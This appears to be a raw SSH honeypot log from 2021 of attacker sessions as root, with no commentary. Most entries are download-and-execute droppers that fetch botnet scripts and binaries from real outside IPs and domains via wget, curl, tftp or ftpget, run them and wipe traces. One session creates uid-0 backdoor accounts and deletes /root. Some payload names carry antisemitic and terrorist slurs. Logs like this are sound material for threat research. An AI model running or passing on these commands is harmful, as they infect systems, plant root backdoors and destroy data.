cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.11.244.208/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 51.11.244.208 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 51.11.244.208
chmod 777 tftp2.sh

From 167.71.57.26 25-Feb-2021 23:49:01 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://194.15.36.227/darknetbins.sh; chmod 777 darknetbins.sh; sh darknetbins.sh; tftp 194.15.36.227 -c get darknettftp1.sh; chmod 777 darknettftp1.sh; sh darknettftp1.sh; tftp -r darknettftp2.sh -g 194.15.36.227; chmod 777 darknettftp2.sh; sh darknettftp2.sh; rm -rf darknetbins.sh darknettftp1.sh darknettftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://194.15.36.227/darknetbins.sh
chmod 777 darknetbins.sh
sh darknetbins.sh
tftp 194.15.36.227 -c get darknettftp1.sh
chmod 777 darknettftp1.sh
sh darknettftp1.sh
tftp -r darknettftp2.sh -g 194.15.36.227
chmod 777 darknettftp2.sh
sh darknettftp2.sh
rm -rf darknetbins.sh darknettftp1.sh darknettftp2.sh
rm -rf *

From 209.141.45.21 26-Feb-2021 00:24:40 ssh2 root
Exec wget http://kranskerstuff.kozow.com:8281/sshd -O /var/tmp/sshd; curl http://kranskerstuff.kozow.com:8281/sshd -o /var/tmp/sshd; sh /var/tmp/sshd; rm -rf /var/tmp/sshd; rm -rf /var/tmp/sshd.1; rm -rf /var/tmp/sshd.2
wget http://kranskerstuff.kozow.com:8281/sshd -O /var/tmp/sshd
curl http://kranskerstuff.kozow.com:8281/sshd -o /var/tmp/sshd
sh /var/tmp/sshd
rm -rf /var/tmp/sshd
rm -rf /var/tmp/sshd.1
rm -rf /var/tmp/sshd.2

From 222.206.231.192 27-Feb-2021 15:37:09 ssh2 root
Exec uname -a -v -n
uname -a -v -n

From 2.57.122.97 28-Feb-2021 19:50:24 ssh2 root
Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'

From 2.57.122.97 1-Mar-2021 00:53:37 ssh2 root
Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'

From 209.141.45.21 2-Mar-2021 03:36:49 ssh2 root
Exec cd /tmp; wget sinpropfenoquito.freemyip.com:8281/sshd -O /tmp/sshd; curl sinpropfenoquito.freemyip.com:8281/sshd -o /tmp/sshd; bash /tmp/sshd; rm -rf /tmp/sshd; rm -r /tmp/sshd; rm -rf /var/tmp/sshd; rm -rf /var/tmp/sshd.*; rm -rf /tmp/sshd.*
cd /tmp
wget sinpropfenoquito.freemyip.com:8281/sshd -O /tmp/sshd
curl sinpropfenoquito.freemyip.com:8281/sshd -o /tmp/sshd
bash /tmp/sshd
rm -rf /tmp/sshd
rm -r /tmp/sshd
rm -rf /var/tmp/sshd
rm -rf /var/tmp/sshd.*
rm -rf /tmp/sshd.*

From 31.210.20.147 2-Mar-2021 09:40:27 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.147/0xDSSk.sh; curl -O http://31.210.20.147/0xDSSk.sh; chmod 777 0xDSSk.sh; sh 0xDSSk.sh; tftp 31.210.20.147 -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 31.210.20.147; rm -rf *.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://31.210.20.147/0xDSSk.sh
curl -O http://31.210.20.147/0xDSSk.sh
chmod 777 0xDSSk.sh
sh 0xDSSk.sh
tftp 31.210.20.147 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 31.210.20.147
rm -rf *.sh

From 45.133.1.167 2-Mar-2021 17:56:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.144.225.151/huh.sh; curl -O http://45.144.225.151/huh.sh; chmod 777 huh.sh; sh huh.sh; tftp 45.144.225.151 -c get huh.sh; chmod 777 huh.sh; sh huh.sh; tftp -r huh2.sh -g 45.144.225.151; chmod 777 huh2.sh; sh huh2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.144.225.151 huh1.sh huh1.sh; sh huh1.sh; rm -rf huh.sh huh.sh huh2.sh huh1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.144.225.151/huh.sh
curl -O http://45.144.225.151/huh.sh
chmod 777 huh.sh
sh huh.sh
tftp 45.144.225.151 -c get huh.sh
chmod 777 huh.sh
sh huh.sh
tftp -r huh2.sh -g 45.144.225.151
chmod 777 huh2.sh
sh huh2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.144.225.151 huh1.sh huh1.sh
sh huh1.sh
rm -rf huh.sh huh.sh huh2.sh huh1.sh
rm -rf *

From 52.152.130.178 3-Mar-2021 03:17:23 ssh2 root
Exec lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *
lscpu
wget nasapaul.com/ninfo
chmod +x *
./ninfo
rm -rf *

From 128.199.233.83 4-Mar-2021 01:31:20 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://108.170.53.114/sh; curl -O http://108.170.53.114/sh; chmod 777 sh; sh sh; tftp 108.170.53.114 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 108.170.53.114; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 108.170.53.114 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://108.170.53.114/sh
curl -O http://108.170.53.114/sh
chmod 777 sh
sh sh
tftp 108.170.53.114 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 108.170.53.114
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 108.170.53.114 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 40.123.248.170 5-Mar-2021 02:25:28 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://191.232.48.138/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 191.232.48.138 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 191.232.48.138; chmod 777 tftp2.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://191.232.48.138/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 191.232.48.138 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 191.232.48.138
chmod 777 tftp2.sh

From 198.23.159.28 6-Mar-2021 16:24:57 ssh2 root
Exec cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9
}'

From 31.210.22.2 7-Mar-2021 05:43:29 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.109/ModpEAD/xJSq.x86_64; curl -O http://109.104.151.109/ModpEAD/xJSq.x86_64;cat xjSq.x86_64 >kzpold ;chmod +x *;./kzpold Selfrep.x86_64; tftp 109.104.151.109 -c get xjSq.x86_64; chmod 777 xjSq.x86_64; ./xjSq.x86_64 Exploit.x86_64; rm -rf *.x86_64 kzpold; rm -rf *.x86_64 kzpold
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.109/ModpEAD/xJSq.x86_64
curl -O http://109.104.151.109/ModpEAD/xJSq.x86_64
cat xjSq.x86_64 >kzpold
chmod +x *
./kzpold Selfrep.x86_64
tftp 109.104.151.109 -c get xjSq.x86_64
chmod 777 xjSq.x86_64
./xjSq.x86_64 Exploit.x86_64
rm -rf *.x86_64 kzpold
rm -rf *.x86_64 kzpold

From 40.124.40.216 7-Mar-2021 08:14:08 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.208.155.37/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g 104.208.155.37 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://104.208.155.37/ISIS.sh
chmod 777 *
sh ISIS.sh
tftp -g 104.208.155.37 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 130.61.219.221 7-Mar-2021 16:36:55 ssh2 root
Exec cd /tmp; wget sinpropfenoquitos.freemyip.com:8281/sshd -O /tmp/sshd; curl sinpropfenoquitos.freemyip.com:8281/sshd -o /tmp/sshd; bash /tmp/sshd; rm -rf /tmp/sshd; rm -r /tmp/sshd; rm -rf /var/tmp/sshd; rm -rf /var/tmp/sshd.*; rm -rf /tmp/sshd.*
cd /tmp
wget sinpropfenoquitos.freemyip.com:8281/sshd -O /tmp/sshd
curl sinpropfenoquitos.freemyip.com:8281/sshd -o /tmp/sshd
bash /tmp/sshd
rm -rf /tmp/sshd
rm -r /tmp/sshd
rm -rf /var/tmp/sshd
rm -rf /var/tmp/sshd.*
rm -rf /tmp/sshd.*

From 31.210.22.2 8-Mar-2021 14:23:16 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.108/LjEZs/uYtea.x86_64; curl -O http://109.104.151.108/LjEZs/uYtea.x86_64;cat uYtea.x86_64 >kzpold ;chmod +x *;./kzpold Selfrep.x86_64; tftp 109.104.151.108 -c get uYtea.x86_64; chmod 777 uYtea.x86_64; ./uYtea.x86_64 Exploit.x86_64; rm -rf *.x86_64 kzpold
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.108/LjEZs/uYtea.x86_64
curl -O http://109.104.151.108/LjEZs/uYtea.x86_64
cat uYtea.x86_64 >kzpold
chmod +x *
./kzpold Selfrep.x86_64
tftp 109.104.151.108 -c get uYtea.x86_64
chmod 777 uYtea.x86_64
./uYtea.x86_64 Exploit.x86_64
rm -rf *.x86_64 kzpold

From 165.232.136.87 9-Mar-2021 08:02:06 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://52.152.130.178/sh; curl -O http://52.152.130.178/sh; chmod 777 sh; sh sh; tftp 52.152.130.178 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 52.152.130.178; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 52.152.130.178 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://52.152.130.178/sh
curl -O http://52.152.130.178/sh
chmod 777 sh
sh sh
tftp 52.152.130.178 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 52.152.130.178
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 52.152.130.178 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 202.28.194.163 11-Mar-2021 22:54:23 ssh2 root
Exec cd /tmp;wget 31.210.20.24/bins/UnHAnaAW.x86;chmod +x UnHAnaAW.x86;./UnHAnaAW.x86 Root
cd /tmp
wget 31.210.20.24/bins/UnHAnaAW.x86
chmod +x UnHAnaAW.x86
./UnHAnaAW.x86 Root

From 45.130.138.155 13-Mar-2021 14:50:54 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.23.133.218/Pemex.sh; curl -O http://198.23.133.218/Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp 198.23.133.218 -c get Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp -r Pemex2.sh -g 198.23.133.218; chmod 777 Pemex2.sh; sh Pemex2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.23.133.218 Pemex1.sh Pemex1.sh; sh Pemex1.sh; rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.23.133.218/Pemex.sh
curl -O http://198.23.133.218/Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp 198.23.133.218 -c get Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp -r Pemex2.sh -g 198.23.133.218
chmod 777 Pemex2.sh
sh Pemex2.sh
ftpget -v -u anonymous -p anonymous -P 21 198.23.133.218 Pemex1.sh Pemex1.sh
sh Pemex1.sh
rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh
rm -rf *

From 74.201.28.61 14-Mar-2021 01:52:51 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://142.11.216.5/xxxbins.sh; chmod 777 xxxbins.sh; sh xxxbins.sh; tftp 142.11.216.5 -c get xxxtftp1.sh; chmod 777 xxxtftp1.sh; sh xxxtftp1.sh; tftp -r xxxtftp2.sh -g 142.11.216.5; chmod 777 xxxtftp2.sh; sh xxxtftp2.sh; rm -rf xxxbins.sh xxxtftp1.sh xxxtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://142.11.216.5/xxxbins.sh
chmod 777 xxxbins.sh
sh xxxbins.sh
tftp 142.11.216.5 -c get xxxtftp1.sh
chmod 777 xxxtftp1.sh
sh xxxtftp1.sh
tftp -r xxxtftp2.sh -g 142.11.216.5
chmod 777 xxxtftp2.sh
sh xxxtftp2.sh
rm -rf xxxbins.sh xxxtftp1.sh xxxtftp2.sh
rm -rf *

From 31.210.20.159 14-Mar-2021 13:43:41 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.108/LjEZs/uYtea.x86_64; curl -O http://109.104.151.108/LjEZs/uYtea.x86;cat uYtea.x86 >kzpold ;chmod +x *;./kzpold Exploit.x86_64; tftp 109.104.151.108 -c get uYtea.x86; chmod 777 uYtea.x86; ./uYtea.x86 Exploit.x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.108/LjEZs/uYtea.x86_64
curl -O http://109.104.151.108/LjEZs/uYtea.x86
cat uYtea.x86 >kzpold
chmod +x *
./kzpold Exploit.x86_64
tftp 109.104.151.108 -c get uYtea.x86
chmod 777 uYtea.x86
./uYtea.x86 Exploit.x86_64

From 203.159.80.90 15-Mar-2021 04:23:06 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.168.46.11/aarikibins.sh; chmod 777 aarikibins.sh; sh aarikibins.sh; tftp 104.168.46.11 -c get aarikitftp1.sh; chmod 777 aarikitftp1.sh; sh aarikitftp1.sh; tftp -r aarikitftp2.sh -g 104.168.46.11; chmod 777 aarikitftp2.sh; sh aarikitftp2.sh; rm -rf aarikibins.sh aarikitftp1.sh aarikitftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.168.46.11/aarikibins.sh
chmod 777 aarikibins.sh
sh aarikibins.sh
tftp 104.168.46.11 -c get aarikitftp1.sh
chmod 777 aarikitftp1.sh
sh aarikitftp1.sh
tftp -r aarikitftp2.sh -g 104.168.46.11
chmod 777 aarikitftp2.sh
sh aarikitftp2.sh
rm -rf aarikibins.sh aarikitftp1.sh aarikitftp2.sh
rm -rf *

From 31.210.20.179 15-Mar-2021 06:28:02 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.108/0x83911d24Fx.sh; curl -O http://109.104.151.108/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 109.104.151.108 -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 109.104.151.108; chmod 777 0xtf2984767.sh; sh 0xtf2984767.sh; ftpget -v -u anonymous -p anonymous -P 21 109.104.151.108 0xft6426467.sh 0xft6426467.sh; sh 0xft6426467.sh; rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.108/0x83911d24Fx.sh
curl -O http://109.104.151.108/0x83911d24Fx.sh
chmod 777 0x83911d24Fx.sh
sh 0x83911d24Fx.sh
tftp 109.104.151.108 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 109.104.151.108
chmod 777 0xtf2984767.sh
sh 0xtf2984767.sh
ftpget -v -u anonymous -p anonymous -P 21 109.104.151.108 0xft6426467.sh 0xft6426467.sh
sh 0xft6426467.sh
rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh
rm -rf *

From 143.110.239.48 15-Mar-2021 09:08:46 ssh2 root
Exec wget nasapaul.com/ninfo ; chmod 777 *; ./ninfo ; lscpu
wget nasapaul.com/ninfo
chmod 777 *
./ninfo
lscpu

From 109.104.151.109 18-Mar-2021 03:56:00 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.108/LjEZs/uYtea.x86_64; curl -O http://109.104.151.108/LjEZs/uYtea.x86;cat uYtea.x86_64 >kzpold ;chmod 777 kzpold;./kzpold Exploit.x86_64; tftp 109.104.151.108 -c get uYtea.x86; chmod 777 uYtea.x86; ./uYtea.x86 Selfrep.x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.108/LjEZs/uYtea.x86_64
curl -O http://109.104.151.108/LjEZs/uYtea.x86
cat uYtea.x86_64 >kzpold
chmod 777 kzpold
./kzpold Exploit.x86_64
tftp 109.104.151.108 -c get uYtea.x86
chmod 777 uYtea.x86
./uYtea.x86 Selfrep.x86_64

From 142.93.227.249 18-Mar-2021 22:20:25 ssh2 root
Exec nproc; lspci |grep VGA
nproc
lspci |grep VGA

From 104.236.26.150 19-Mar-2021 16:35:45 ssh2 root
Exec cat /etc/issue ; cwget http://107.172.188.150/INFINITY.x86; chmod +x INFINITY.x86; ./INFINITY.x86; rm -rf INFINITY.x86
cat /etc/issue
cwget http://107.172.188.150/INFINITY.x86
chmod +x INFINITY.x86
./INFINITY.x86
rm -rf INFINITY.x86

From 95.110.134.241 19-Mar-2021 20:53:27 ssh2 root
Exec rm -rf shell;wget http://96.126.105.180/shell;chmod +x shell;./shell;rm -rf shell
rm -rf shell
wget http://96.126.105.180/shell
chmod +x shell
./shell
rm -rf shell

From 185.36.81.52 19-Mar-2021 22:20:26 ssh2 root
Exec payload
payload

From 104.248.197.205 19-Mar-2021 23:47:34 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.75.191.234/sh; curl -O http://51.75.191.234/sh; chmod 777 sh; sh sh; tftp 51.75.191.234 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 51.75.191.234; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 51.75.191.234 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.75.191.234/sh
curl -O http://51.75.191.234/sh
chmod 777 sh
sh sh
tftp 51.75.191.234 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 51.75.191.234
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 51.75.191.234 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 167.71.4.101 20-Mar-2021 03:25:38 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://51.75.191.234/Onionbins.sh; chmod 777 Onionbins.sh; sh Onionbins.sh; tftp 51.75.191.234 -c get Oniontftp1.sh; chmod 777 Oniontftp1.sh; sh Oniontftp1.sh; tftp -r Oniontftp2.sh -g 51.75.191.234; chmod 777 Oniontftp2.sh; sh Oniontftp2.sh; rm -rf Onionbins.sh Oniontftp1.sh Oniontftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://51.75.191.234/Onionbins.sh
chmod 777 Onionbins.sh
sh Onionbins.sh
tftp 51.75.191.234 -c get Oniontftp1.sh
chmod 777 Oniontftp1.sh
sh Oniontftp1.sh
tftp -r Oniontftp2.sh -g 51.75.191.234
chmod 777 Oniontftp2.sh
sh Oniontftp2.sh
rm -rf Onionbins.sh Oniontftp1.sh Oniontftp2.sh
rm -rf *

From 161.35.179.60 20-Mar-2021 23:42:46 ssh2 root
Exec cat /etc/issue ; wget http://107.172.188.150/INFINITY.x86; chmod +x INFINITY.x86; ./INFINITY.x86; rm -rf INFINITY.x86
cat /etc/issue
wget http://107.172.188.150/INFINITY.x86
chmod +x INFINITY.x86
./INFINITY.x86
rm -rf INFINITY.x86

From 104.236.26.153 21-Mar-2021 05:37:41 ssh2 root
Exec cat /etc/issue ; wget http://107.172.188.150/INFINITY.x86; chmod +x INFINITY.x86; ./INFINITY.x86; rm -rf INFINITY.x86 *
cat /etc/issue
wget http://107.172.188.150/INFINITY.x86
chmod +x INFINITY.x86
./INFINITY.x86
rm -rf INFINITY.x86 *

From 199.195.251.205 22-Mar-2021 11:55:18 ssh2 root
Exec cd /tmp; wget http://107.172.249.148/d; curl -O http://107.172.249.148/c; busybox wget http://107.172.249.148/m; chmod 777 d; chmod 777 c; chmod 777 m;  ./d; echo wgets done ; ./c; echo curl done; ./m; echo busybox ran; pkill x-8.6-.ISIS; pkill fuckjewishpeople.x86; pkill x86; pkill x86_64; pkill i686; rm -rf *;
cd /tmp
wget http://107.172.249.148/d
curl -O http://107.172.249.148/c
busybox wget http://107.172.249.148/m
chmod 777 d
chmod 777 c
chmod 777 m
./d
echo wgets done
./c
echo curl done
./m
echo busybox ran
pkill x-8.6-.ISIS
pkill fuckjewishpeople.x86
pkill x86
pkill x86_64
pkill i686
rm -rf *

From 199.195.251.205 23-Mar-2021 05:21:11 ssh2 root
Exec cd /tmp; wget http://107.172.249.148/x86_64; chmod 777 *; ./x86_64 roots
cd /tmp
wget http://107.172.249.148/x86_64
chmod 777 *
./x86_64 roots

From 79.124.60.185 24-Mar-2021 03:14:28 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://87.121.98.51/infectedn.sh; curl -O http://87.121.98.51/infectedn.sh; chmod 777 infectedn.sh; sh infectedn.sh; tftp 87.121.98.51 -c get infectedn.sh; chmod 777 infectedn.sh; sh infectedn.sh; tftp -r infectedn2.sh -g 87.121.98.51; chmod 777 infectedn2.sh; sh infectedn2.sh; ftpget -v -u anonymous -p anonymous -P 21 87.121.98.51 infectedn1.sh infectedn1.sh; sh infectedn1.sh; rm -rf infectedn.sh infectedn.sh infectedn2.sh infectedn1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://87.121.98.51/infectedn.sh
curl -O http://87.121.98.51/infectedn.sh
chmod 777 infectedn.sh
sh infectedn.sh
tftp 87.121.98.51 -c get infectedn.sh
chmod 777 infectedn.sh
sh infectedn.sh
tftp -r infectedn2.sh -g 87.121.98.51
chmod 777 infectedn2.sh
sh infectedn2.sh
ftpget -v -u anonymous -p anonymous -P 21 87.121.98.51 infectedn1.sh infectedn1.sh
sh infectedn1.sh
rm -rf infectedn.sh infectedn.sh infectedn2.sh infectedn1.sh
rm -rf *

From 45.143.221.129 25-Mar-2021 01:53:02 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 45.143.221.129/warz.sh; curl -O 45.143.221.129/warz.sh; chmod 777 warz.sh; sh warz.sh; rm -rf warz.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget 45.143.221.129/warz.sh
curl -O 45.143.221.129/warz.sh
chmod 777 warz.sh
sh warz.sh
rm -rf warz.sh

From 188.161.203.67 25-Mar-2021 15:00:30 ssh2 root
ls
w
free -g
/usr/sbin/useradd -o -u 0 -g 0 r00t -p admin1234
/usr/sbin/useradd -o -u 0 -g 0 .test -p admin1234 passwd root
passwd r00t
passwd .test A@0599343813A@0599343813
history
yum
apt
apt-get update
apt update
apt upgrade
wge
wget
wget http://130.0.164.120/scan.jpg
wget http://130.0.164.120/scan.jpg

From 61.163.97.210 25-Mar-2021 15:04:12 ssh2 root
Exec scp -r -t ~
scp -r -t ~
cd ..
ls
cd ..
ls
cat proxy.doc
cd /root
cat proxy.doc
cat test1.pl
rm -rf /root
ls

From 188.161.203.67 25-Mar-2021 15:06:02 ssh2 root
ls
w

From 87.121.98.51 27-Mar-2021 23:35:36 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.124.60.185/infectedn.sh; curl -O http://79.124.60.185/infectedn.sh; chmod 777 infectedn.sh; sh infectedn.sh; tftp 79.124.60.185 -c get infectedn.sh; chmod 777 infectedn.sh; sh infectedn.sh; tftp -r infectedn2.sh -g 79.124.60.185; chmod 777 infectedn2.sh; sh infectedn2.sh; ftpget -v -u anonymous -p anonymous -P 21 79.124.60.185 infectedn1.sh infectedn1.sh; sh infectedn1.sh; rm -rf infectedn.sh infectedn.sh infectedn2.sh infectedn1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://79.124.60.185/infectedn.sh
curl -O http://79.124.60.185/infectedn.sh
chmod 777 infectedn.sh
sh infectedn.sh
tftp 79.124.60.185 -c get infectedn.sh
chmod 777 infectedn.sh
sh infectedn.sh
tftp -r infectedn2.sh -g 79.124.60.185
chmod 777 infectedn2.sh
sh infectedn2.sh
ftpget -v -u anonymous -p anonymous -P 21 79.124.60.185 infectedn1.sh infectedn1.sh
sh infectedn1.sh
rm -rf infectedn.sh infectedn.sh infectedn2.sh infectedn1.sh
rm -rf *

From 199.195.251.205 28-Mar-2021 16:32:36 ssh2 root
Exec rm -rf x86_64; cd /tmp; wget http://107.172.249.148/x86_64; curl -O http://107.172.249.148/x86_64; busybox wget http://107.172.249.148/x86_64; chmod 777 x86_64; ./x86_64 roots; rm -rf *; nc 1 1;
rm -rf x86_64
cd /tmp
wget http://107.172.249.148/x86_64
curl -O http://107.172.249.148/x86_64
busybox wget http://107.172.249.148/x86_64
chmod 777 x86_64
./x86_64 roots
rm -rf *
nc 1 1

From 113.54.156.146 29-Mar-2021 09:16:30 ssh2 root
Exec uname -a
uname -a
Exec uname -a
Exec uname -a
uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a

From 113.54.156.146 29-Mar-2021 09:16:32 ssh2 root
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a

From 138.201.225.164 30-Mar-2021 01:49:14 ssh2 root
Exec wget nasapaul.com/ninfo ;chmod 777 *; ./ninfo
wget nasapaul.com/ninfo
chmod 777 *
./ninfo

From 168.119.208.213 30-Mar-2021 08:21:42 ssh2 root
Exec wget NasaPaul.com/ninfo ;chmod 777 *; ./ninfo
wget NasaPaul.com/ninfo
chmod 777 *
./ninfo

From 104.168.123.206 3-Apr-2021 05:43:18 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 209.141.49.42/warz.sh; curl -O 209.141.49.42/warz.sh; chmod 777 warz.sh; sh warz.sh; rm -rf warz.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget 209.141.49.42/warz.sh
curl -O 209.141.49.42/warz.sh
chmod 777 warz.sh
sh warz.sh
rm -rf warz.sh
rm -rf *

From 100.21.159.3 3-Apr-2021 18:07:38 ssh2 root
Exec echo -n a2xdtJSf|md5sum
echo -n a2xdtJSf|md5sum

From 134.209.239.209 5-Apr-2021 04:07:09 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.151.61.216/incubusdream.sh; chmod 777 incubusdream.sh; sh incubusdream.sh; tftp 45.151.61.216 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.151.61.216; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.151.61.216/incubusdream.sh
chmod 777 incubusdream.sh
sh incubusdream.sh
tftp 45.151.61.216 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 45.151.61.216
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 185.36.81.58 6-Apr-2021 17:41:35 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://45.14.149.204/x86_64; chmod 777 *; ./x86_64 x86hxed; pkill xmrig; pkill cnrig;
cd /tmp
rm -rf x86_64
wget http://45.14.149.204/x86_64
chmod 777 *
./x86_64 x86hxed
pkill xmrig
pkill cnrig

From 82.156.18.109 6-Apr-2021 17:53:21 ssh2 root
Exec echo -n Vf9tW2gR|md5sum
echo -n Vf9tW2gR|md5sum

From 185.36.81.58 7-Apr-2021 06:17:15 ssh2 root
